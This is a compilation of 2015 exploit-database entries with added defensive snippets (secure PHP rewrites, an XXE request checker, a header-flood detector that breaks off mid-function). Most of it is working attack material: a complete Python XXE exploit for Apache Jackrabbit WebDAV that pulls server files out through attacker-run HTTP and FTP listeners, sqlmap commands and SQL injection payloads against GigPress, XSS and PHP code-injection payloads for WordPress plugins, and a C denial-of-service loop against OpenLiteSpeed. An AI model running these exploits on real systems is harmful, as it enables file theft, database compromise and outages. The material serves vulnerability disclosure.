+++++++++++++++++++++++++++++++++++++++++


* POC:
http://[domain]/wp-admin/post-new.php?post_type=inbound-forms&post='></iframe><script>alert(String.fromCharCode(88, 83, 83))</script>
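The two vulnerable snippets of this advisory and the two NewStatPress snippets in the previous one, rewritten with WordPress's query and escaping APIs. This is an added example, not code from either plugin; the function names and the allowed-column list are assumptions.

```php
<?php
// Added example (not the plugins' own code): the vulnerable snippets from
// NewStatPress (includes/nsp_search.php) and WordPress Landing Pages
// (modules/module.ab-testing.php, shared/shortcodes/inbound-shortcodes.php)
// rewritten safely. Function names and $allowed_columns are assumed; the
// $wpdb, esc_*, absint and add_query_arg calls are real WordPress APIs.

/**
 * NewStatPress search filter (replaces the loop at nsp_search.php:94).
 * Column names cannot be bound with prepare(), so they are checked against a
 * fixed whitelist; the search value is bound with %s after LIKE-escaping.
 */
function nsp_build_where_clause( array $get ) {
    global $wpdb;

    // Columns a user may filter on (assumed list of statpress fields).
    $allowed_columns = array( 'agent', 'ip', 'os', 'browser', 'urlrequested', 'referer' );

    $where = '';
    for ( $i = 1; $i <= 3; $i++ ) {
        $column = isset( $get["where$i"] ) ? (string) $get["where$i"] : '';
        $value  = isset( $get["what$i"] )  ? (string) $get["what$i"]  : '';
        if ( '' === $column || '' === $value ) {
            continue;
        }
        if ( ! in_array( $column, $allowed_columns, true ) ) {
            // Unknown identifier: refuse instead of interpolating it into SQL.
            continue;
        }
        // esc_like() escapes % and _ so the input cannot widen the match;
        // prepare() quotes the value, so a stray quote cannot end the string.
        $like   = '%' . $wpdb->esc_like( $value ) . '%';
        $where .= $wpdb->prepare( " AND `$column` LIKE %s", $like );
    }
    return $where;
}

/**
 * NewStatPress table header (replaces nsp_search.php:128): the column name is
 * HTML-escaped before printing, so a <script> tag in where1 renders as text.
 */
function nsp_render_headers( array $get ) {
    $html = '';
    for ( $i = 1; $i <= 3; $i++ ) {
        if ( ! empty( $get["where$i"] ) ) {
            $html .= "<th scope='col'>" . esc_html( ucfirst( (string) $get["where$i"] ) ) . '</th>';
        }
    }
    return $html;
}

/**
 * Landing Pages postmeta lookup (replaces module.ab-testing.php:100):
 * the post id is coerced to a non-negative integer and bound with %d.
 */
function lp_get_variation_meta( $post_param ) {
    global $wpdb;
    $post_id = absint( $post_param );
    if ( 0 === $post_id ) {
        return array();
    }
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT `meta_key`, `meta_value` FROM {$wpdb->postmeta} WHERE `post_id` = %d",
            $post_id
        )
    );
}

/**
 * Landing Pages shortcode preview (replaces inbound-shortcodes.php:761):
 * the src is built with add_query_arg() from an integer id and passed through
 * esc_url() inside the attribute, so '></iframe><script> cannot break out.
 */
function lp_render_preview_iframe( $base_url, $post_param ) {
    $src = add_query_arg(
        array( 'sc' => '', 'post' => absint( $post_param ) ),
        $base_url . 'shortcodes/preview.php'
    );
    return "<iframe src='" . esc_url( $src ) . "' width=\"285\" frameborder=\"0\" id=\"inbound-shortcodes-preview\"></iframe>";
}
```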


 Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response.
2015-05-22: Vendor fix.
2015-05-25: Public disclosure.
            
#!/usr/bin/env python
"""
# Exploit Title: Jackrabbit WebDAV XXE
# Date: 25-05-2015
# Software Link: http://jackrabbit.apache.org/jcr/
# Exploit Author: Mikhail Egorov
# Contact: 0ang3el () gmail com
# Website: http://0ang3el.blogspot.com
# CVE: CVE-2015-1833
# Category: webapps

1. Description

The Jackrabbit WebDAV plugin uses an insecurely configured XML parser to parse
incoming PROPPATCH and PROPFIND requests. As a result it is vulnerable to
XXE attacks.
Besides Jackrabbit JCR, the WebDAV plugin is incorporated into the following
software: Apache Sling, Adobe AEM.

2. Proof of Concept

Download the vulnerable Apache Sling launchpad web application from
https://sling.apache.org

Start launchpad web application as follows:
root@kali:~/build-sling# java -jar
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar

Launch exploit with the following command:
root@kali:~# python cve-2015-1833.py --url http://127.0.0.1:8080/content/xxe
--tech oob --ip 127.0.0.1
enter command> get .

loaded 210 bytes in buffer

enter command> show

apache-maven-3.0.5
apache-maven-3.0.5-bin.tar.gz
derby.log
eclipse
hs_err_pid5379.log
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar
python-workspace

enter command> store /tmp/cwd.lst

buffer content has been stored in file /tmp/cwd.lst

enter command> exit
root@kali:~#

The exploit has three exploitation techniques:
* inb1 - inbound XXE technique: it first writes content as an attribute value
of a controllable JCR node using a PROPPATCH request and then retrieves the
content using a PROPFIND request
* inb2 - same as inb1, but with some XML magic to retrieve content that
is not valid XML data
* oob - out-of-band technique, which uses the FTP trick from this blog post:
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Technique inb2 is the most stable, but it requires the credentials of a user
that is able to modify some JCR node, and the attacker's host must have a
"visible ip" for the communication between the target and the attacker's host.
Technique oob works even with anonymous credentials, but it is not as
stable as inb2.
Technique inb1 does not require a "visible ip", but there are limitations on
the retrieved content.

3. Solution:

If you use Apache Jackrabbit, install version 2.10.1.
http://www.apache.org/dist/jackrabbit/2.10.1/RELEASE-NOTES.txt
"""
from urllib2 import *
import sys, string, random
import base64
import xml.etree.ElementTree as ET
import BaseHTTPServer, SimpleHTTPServer
from multiprocessing import Process, Value, Manager
from optparse import OptionParser
import socket, select

usage= """
    %prog --url <url> --tech inb1 [ --creds <creds> ]
    
    %prog --url <url> --tech inb2 --ip <ip> [ --creds <creds> --hport <hport> ]
    
    %prog --url <url> --tech oob --ip <ip> [ --creds <creds> --hport <hport> --fport <fport>]
"""

help_interpreter = """
    help - print this help.
    
    get <dir or file> - retrieve directory listing or file content and store it inside internal buffer. You can use "." to denote current directory (e.g. use "get ." for cwd listing).
    
    show - show content of internal buffer.
    
    store <out file> - store internal buffer in file.
    
    exit - stop exploiting
    """
    
failure_descr = """
Possible reasons:
    1. Inappropriate technique, try another options.
    2. You do not have permissions to read file or list directory.
    3. Target is not exploitable.
"""
    
rand_attr = ''
script_name = sys.argv[0].split('/')[-1]

buffer_with_loot = ''

url, tech, ip, creds, hport, fport = [None] * 6

http_server, ftp_server = [None] * 2

class HTTP_XXE():
    def __init__(self, ip, port, fport):
        self.port = port
        self.ip = ip
        self.fport = fport
        
    def run(self):
        class http_handler(BaseHTTPServer.BaseHTTPRequestHandler):
            def __init__(self, ip, fport,*args):
                self.ip = ip
                self.fport = fport
                BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
                
            def do_GET(self):
                if "inb2" in self.path:
                    self.send_response(200)
                    self.send_header('Content-type','application/xml')
                    self.end_headers()
                    self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY all "%start;%loot;%end;">')
                    
                if "oob" in self.path:
                    self.send_response(200)
                    self.send_header('Content-type','application/xml')
                    self.end_headers()
                    self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY %% all "<!ENTITY &#37; send SYSTEM "ftp://%(ip)s:%(port)s/%%loot;">">%%all;' % {'ip' : self.ip, 'port' : self.fport})
                    
            def log_message(self, format, *args): # silent HTTP server
                return
                               
        def serve(httpd):
            while True:
                httpd.handle_request()
        
        handler = lambda *args: http_handler(self.ip, self.fport, *args)    
        httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', self.port), handler)
        self.proc = Process(target = serve, args = (httpd,))
        self.proc.start()
            
    def stop(self):
        self.proc.terminate()
    
class FTP_XXE():
    def __init__(self, port):
        self.port = port
        
    def run(self):
        class ftp_handler():
            def __init__(self, port):
                self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                self.server.setblocking(0)
                self.server.bind(('0.0.0.0', port))
                self.server.listen(5)
                
            def serve(self, d):
                inputs = [self.server]
                while True:
                    readable, writable, exceptional = select.select(inputs, [], [])
                    
                    for s in readable:
                        if s is self.server:
                            connection, client_address = s.accept()
                            connection.setblocking(0)
                            inputs.append(connection)
                            
                            connection.send("220 xxe-ftp-server\n")
                        else:
                            data = s.recv(1024)
                            
                            if not data:
                                inputs.remove(s)
                                continue
                            
                            if "USER" in data:
                                s.send("331 password please - version check\n")
                            else:
                                s.send("230 more data please!\n")
                                if not len([x for x in ["PASS","EPSV","EPRT","TYPE"] if x in data]):
                                    d['loot'] += data
        
        self.d = Manager().dict()
        self.d['loot'] = ''
                               
        ftpd = ftp_handler(self.port)
        self.proc = Process(target = ftpd.serve, args=(self.d,))
        self.proc.start()
    
    def stop(self):
        self.proc.terminate()
        
    def clean_buf(self):
        self.d['loot'] = ''
        
    def get_loot(self):
        loot = self.d['loot']
        
        # clean data
        loot = loot.replace('\r\nRETR ','/')
        loot = loot.replace('\r\nCWD ','/')
        loot = loot.replace('CWD ','',1)
        loot = loot.replace('RETR ','',1)
        
        return loot
            
def exploit(url, technique, creds = 'anonymous:anonymous'):
    
    global buffer_with_loot, rand_attr
    
    requests = {
        'inb1' : {
            'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY loot SYSTEM "%(file)s"> ]> <D:propertyupdate  xmlns:D="DAV:"> <D:set> <D:prop>  <%(attr_name)s>&loot;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
            'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
        },
                
        'inb2' : {
            'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY %% start "<![CDATA["> <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% end "]]>"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/inb2"> %%dtd; ]> <D:propertyupdate  xmlns:D="DAV:"> <D:set> <D:prop>  <%(attr_name)s>&all;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
            'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
        },
                
        'oob' : {
            'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE propfind [ <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/oob"> %%dtd; %%send;  ]> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
        }
    }
     
    def request(url, verb, data, creds, timeout):
        req = Request(url, data)
        req.add_header('User-Agent', script_name)
        req.add_header('Content-Type', 'application/xml')
        req.add_header('Authorization', 'Basic ' + base64.b64encode(creds))
        req.get_method = lambda: verb
        
        #req.set_proxy('127.0.0.1:8081','http')  ### For debug
        
        resp = None
        try:      
            resp =  urlopen(req, timeout = timeout).read()
        except Exception, e:
            pass
        
        return resp
        
    while 1:
        cmdline = raw_input('\033[33menter command> \033[0m')
        cmdline = re.sub('\s+', ' ', cmdline)
        cmd = cmdline.split(' ')[0]
        arg = cmdline.split(' ')[-1]
        
        if cmd not in ['help', 'get', 'show', 'store', 'exit']:
            print '\n\033[36mno such command, use help for command list \033[0m\n'
            continue
        
        if cmd == 'exit':
            break
        
        if cmd == 'help':
            print '\033[36m' + help_interpreter + '\033[0m'
            continue
        
        if cmd == 'show':
            print '\n\033[36m' + buffer_with_loot + '\033[0m'
            continue
        
        if cmd == 'store':
            with open(arg,'w') as outf:
                outf.write(buffer_with_loot)
                
            print '\n\033[32mbuffer content has been stored in file ' + arg + '\033[0m\n'
            continue
        
        if cmd == 'get':
            if arg.startswith('.'):
                arg = '/proc/self/cwd' + arg[1:]
            arg = 'file://' + arg
            
            rand_attr = ''.join([random.choice(string.ascii_lowercase) for i in range(10)]) ### random attribute name where we place content
            
            if technique == 'inb1':
                request1 = requests['inb1']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg}
                request(url, 'PROPPATCH', request1, creds, timeout = 30)
                
                request2 = requests['inb1']['PROPFIND']
                loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
                
                try:
                    buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text
                except:
                    buffer_with_loot = ''
                                  
            if technique == 'inb2':
                request1 = requests['inb2']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg, 'ip' : ip, 'port' : hport}
                request(url, 'PROPPATCH', request1, creds, timeout = 30)
                
                request2 = requests['inb2']['PROPFIND']
                loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
                
                try:              
                    buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text.replace('<[CDATA[','').replace(']]>','')
                except:
                    buffer_with_loot = ''
                    
            if technique == 'oob':
                request1 = requests['oob']['PROPFIND'] % {'file' : arg, 'ip' : ip, 'port' : hport}
                request(url, 'PROPFIND', request1, creds, timeout = 8)

                buffer_with_loot = ftp_server.get_loot()
                
                ftp_server.clean_buf()
                             
            len_ = sys.getsizeof(buffer_with_loot) - sys.getsizeof('')
            print "\n\033[32mloaded %s bytes in buffer\033[0m\n" % len_
            if not len_:
                print '\033[36m' + failure_descr + '\033[0m'
                
            continue

def parse_options():
    global url, tech, ip, creds, hport, fport
    
    parser = OptionParser(usage = usage)
    parser.add_option('--url', dest = url, help = 'url parameter')
    parser.add_option('--tech', dest = tech, help = 'technique, valid values are: inb1, inb2, oob')
    parser.add_option('--creds', dest = creds, help = 'user credentials, default value is anonymous:anonymous')
    parser.add_option('--ip', dest = ip, help = 'ip address of netw interface that your target is able to access')
    parser.add_option('--hport', dest = hport, type = 'int', help = 'port for HTTP server which will be launched during attack, default is 9998')
    parser.add_option('--fport', dest = fport, type = 'int', help = 'port for FTP server which will be launched during attack, default is 9999')
    
    (options, args) = parser.parse_args()
    
    if not options.url or not options.tech:
        print 'you must specify url and tech parameters'
        sys.exit(2)
        
    if options.tech not in ['inb1', 'inb2', 'oob']:
        print 'invalid tech parameter'
        sys.exit(2)
        
    if options.tech != 'inb1' and not options.ip:
        print 'you must specify ip parameter'
        sys.exit(2)
        
    url = options.url
    tech = options.tech
    ip = options.ip
    creds = options.creds if options.creds else 'anonymous:anonymous'
    hport = options.hport if options.hport else 9998
    fport = options.fport if options.fport else 9999

parse_options()

if tech != 'inb1':  
    http_server = HTTP_XXE(ip, hport, fport)
    http_server.run()
    
    if tech == 'oob':
        ftp_server = FTP_XXE(fport)
        ftp_server.run()
    
exploit(url, tech, creds)

if tech != 'inb1': 
    http_server.stop()
    
if tech == 'oob':
    ftp_server.stop()
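All three request shapes described in the header (inb1, inb2, oob) depend on the WebDAV endpoint accepting a DOCTYPE with external entity declarations. The following Python 3 checker is added here and is not part of the original exploit or of Jackrabbit: it scans a request body for that pattern, labels the shape, and refuses to parse anything carrying a DTD. The sample bodies, hostnames and file paths are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET

# Constructed WebDAV bodies modelled on the three techniques (not real traffic):
# inb1 = in-band general entity, inb2 = parameter entities plus an external DTD,
# oob  = out-of-band exfiltration via a remote DTD. Hosts/paths are placeholders.
SAMPLES = {
    "benign": '<?xml version="1.0" encoding="utf-8"?>'
              '<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
    "inb1": '<?xml version="1.0"?><!DOCTYPE propertyupdate ['
            ' <!ENTITY loot SYSTEM "file:///etc/hostname"> ]>'
            '<D:propertyupdate xmlns:D="DAV:"><D:set><D:prop>'
            '<x>&loot;</x></D:prop></D:set></D:propertyupdate>',
    "inb2": '<?xml version="1.0"?><!DOCTYPE propertyupdate ['
            ' <!ENTITY % start "<![CDATA["> <!ENTITY % loot SYSTEM "file:///etc/hostname">'
            ' <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://attacker.invalid:9998/inb2">'
            ' %dtd; ]><D:propertyupdate xmlns:D="DAV:"><D:set><D:prop>'
            '<x>&all;</x></D:prop></D:set></D:propertyupdate>',
    "oob": '<?xml version="1.0"?><!DOCTYPE propfind ['
           ' <!ENTITY % loot SYSTEM "file:///etc/hostname">'
           ' <!ENTITY % dtd SYSTEM "http://attacker.invalid:9998/oob"> %dtd; %send; ]>'
           '<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
}

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name SYSTEM "uri">  or  <!ENTITY [%] name PUBLIC "id" "uri">
EXT_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s+)?([\w.-]+)\s+(?:SYSTEM\s+|PUBLIC\s+"[^"]*"\s+)"([^"]*)"', re.I)
PE_REF_RE = re.compile(r"%[\w.-]+;")          # %name; reference inside the DTD
LOCAL_SCHEMES = {"file", "jar", "netdoc"}     # schemes that only read local data


def external_entities(body):
    """(kind, name, uri, scheme) for every external entity declared in the DTD."""
    out = []
    for m in EXT_ENTITY_RE.finditer(body):
        kind = "parameter" if m.group(1) else "general"
        uri = m.group(3)
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else "relative"
        out.append((kind, m.group(2), uri, scheme))
    return out


def inspect_webdav_body(body):
    """Human-readable findings for one request body; empty list means clean."""
    findings = []
    if not DOCTYPE_RE.search(body):
        return findings           # without a DTD no entity can be declared
    findings.append("DOCTYPE/internal DTD subset in a WebDAV request body")
    for kind, name, uri, scheme in external_entities(body):
        findings.append("external %s entity '%s' -> %s [%s]" % (kind, name, uri, scheme))
    if PE_REF_RE.search(body):
        findings.append("parameter entity reference (%name;) in the DTD")
    return findings


def classify(body):
    """clean | dtd-only | xxe-local (file read only) | xxe-remote (remote DTD/OOB)."""
    if not DOCTYPE_RE.search(body):
        return "clean"
    schemes = {e[3] for e in external_entities(body)}
    if not schemes:
        return "dtd-only"
    return "xxe-remote" if schemes - LOCAL_SCHEMES else "xxe-local"


def safe_parse_or_none(body):
    """Parse the body only when it carries no DTD at all (a WebDAV handler has
    no legitimate need for one); return None when it is refused."""
    if DOCTYPE_RE.search(body):
        return None
    return ET.fromstring(body)


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print("%-6s %-10s %s" % (label, classify(body), inspect_webdav_body(body)))
```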
            
# Title: SQLi vulnerabilities in WordPress plugin "GigPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/gigpress/
# Active installs: 20,000+
# Vulnerable version: 2.3.8
# Fixed version: 2.3.9
# CVE: CVE-2015-4066

Vulnerabilities (2)
=====================

(1) Authenticated SQLi [CWE-89]
-------------------------------

* CODE:
admin/handlers.php:87
+++++++++++++++++++++++++++++++++++++++++
$show['show_tour_id'] = $_POST['show_tour_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:94
+++++++++++++++++++++++++++++++++++++++++
$artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . "");
+++++++++++++++++++++++++++++++++++++++++


* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql
[............]
POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_artist_id (POST)
   Type: error-based
   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new

   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new
---
[12:21:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++


(2) Authenticated SQLi [CWE-89]
-------------------------------

* CODE:
admin/handlers.php:71
+++++++++++++++++++++++++++++++++++++++++
$show['show_venue_id'] = $_POST['show_venue_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:95
+++++++++++++++++++++++++++++++++++++++++
$venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A);
+++++++++++++++++++++++++++++++++++++++++


* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql
[............]
POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_venue_id (POST)
   Type: error-based
   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new

   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new
---
[12:23:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++


Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response and fix.
2015-05-25: Public disclosure.
            
# Exploit Title: Chronosite 5.12 SQL Injection
# Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site"
# Date: 13/05/15
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.chronosite.org/
# Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip
# Version: 5.12
# Tested on: Xampp on Windows7
################################################################
PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27
################################################################
            
# Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/
# Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip
# Version: 1.1
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/121081
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935
# Category: webapps

1. Description

Remote Code Execution via email field.

2. Proof of Concept

POST Request

sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit=

When the admin user checks the subscribers list, the PHP code is executed.

3. Solution

Fixed in version 1.2
            
/*
*	Openlitespeed 1.3.9 Use After Free denial of service exploit.
*
*	This exploit triggers a denial of service condition within the Openlitespeed web 
*	server. This is achieved by sending a tampered request containing a large number (91)
*	of 'a: a' header rows. By looping this request, a memmove call within the HttpReq
*	class is triggered with a freed pointer, resulting in a reference to an invalid
*	memory location and thus a segmentation fault.
*
*	UAF Request:
*	GET / HTTP/1.0
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	a: a
*	
*	The above request should be placed into a file name 'uafcrash' prior to running this
*	exploit code.
*
*	Date: 24/03/2015
*	Author: Denis Andzakovic - Security-Assessment.com
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>	/* declares errno; do not redeclare it as a plain int */

int main(int argc, char ** argv){
	FILE * fp;
	size_t len = 0;
	char * line = NULL;	/* getline() requires NULL or a malloc'd buffer here */
	if((fp = fopen("uafcrash", "r")) == NULL){
		fprintf(stderr, "[!] Error: Could not open file uafcrash: %s\n", strerror(errno));
		return 1;
	}

	char * host = "127.0.0.1";
	int port = 8088;
	int count = 0; 
	int sock;
	struct sockaddr_in serv_addr;
	memset(&serv_addr, 0, sizeof(serv_addr));

	/* replay the request file until the server stops accepting connections */
	while(1){
		if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
			fprintf(stderr, "[!] Error: Could not create socket \n");
			fclose(fp);
			return 1;
		} 

		serv_addr.sin_family = AF_INET;
		serv_addr.sin_port = htons(port);
		inet_pton(AF_INET, host, &serv_addr.sin_addr);

		if(connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0){
			fprintf(stderr, "[!] Error: Could not connect! Check for server crash! Total cases sent:%d\n", count);
			close(sock);
			fclose(fp);
			free(line);
			return 1;
		}

		/* send the file line by line; getline() reuses and grows the buffer */
		while ((getline(&line, &len, fp)) != -1){
			write(sock, line, strlen(line));
		}

		close(sock);
		rewind(fp);
		count++;
	}

	free(line);
	fclose(fp);
	return 42;
}
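A request carrying 91 copies of the same header name is easy to spot at a reverse proxy or in packet captures before it reaches the server. The following Python 3 detector is added here and is not part of the original exploit or of OpenLiteSpeed: it parses a raw request, counts header repetition and flags the shape shown in the header comment. The thresholds and the two sample requests are constructed assumptions; the second sample is a programmatic replica of the request above.

```python
import re
from collections import Counter

# Constructed samples: an ordinary request and a replica of the 91 x "a: a" request
NORMAL_REQUEST = (
    "GET / HTTP/1.0\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: curl/7.29.0\r\n"
    "Accept: */*\r\n"
    "\r\n"
)
UAF_REQUEST = "GET / HTTP/1.0\n" + "a: a\n" * 91 + "\n"

# RFC 7230 field-name token, a colon, optional whitespace, then the value
HEADER_RE = re.compile(r"^([!#$%&'*+\-.^_`|~0-9A-Za-z]+):\s*(.*)$")


def parse_headers(raw):
    """Return (request_line, [(name_lower, value), ...]) for one raw request.
    Parsing stops at the first empty line; a line that is not a valid header
    is kept as ('<malformed>', line) so it still counts toward the totals."""
    lines = raw.split("\n")
    request_line = lines[0].rstrip("\r")
    headers = []
    for line in lines[1:]:
        line = line.rstrip("\r")
        if line == "":
            break
        m = HEADER_RE.match(line)
        if m:
            headers.append((m.group(1).lower(), m.group(2)))
        else:
            headers.append(("<malformed>", line))
    return request_line, headers


def header_stats(raw):
    """(total header count, Counter of occurrences per header name)."""
    _, headers = parse_headers(raw)
    return len(headers), Counter(name for name, _ in headers)


def most_repeated(raw):
    """(name, count) of the most frequent header name, or (None, 0)."""
    _, counts = header_stats(raw)
    if not counts:
        return None, 0
    return counts.most_common(1)[0]


def is_header_flood(raw, max_total=64, max_repeat=8):
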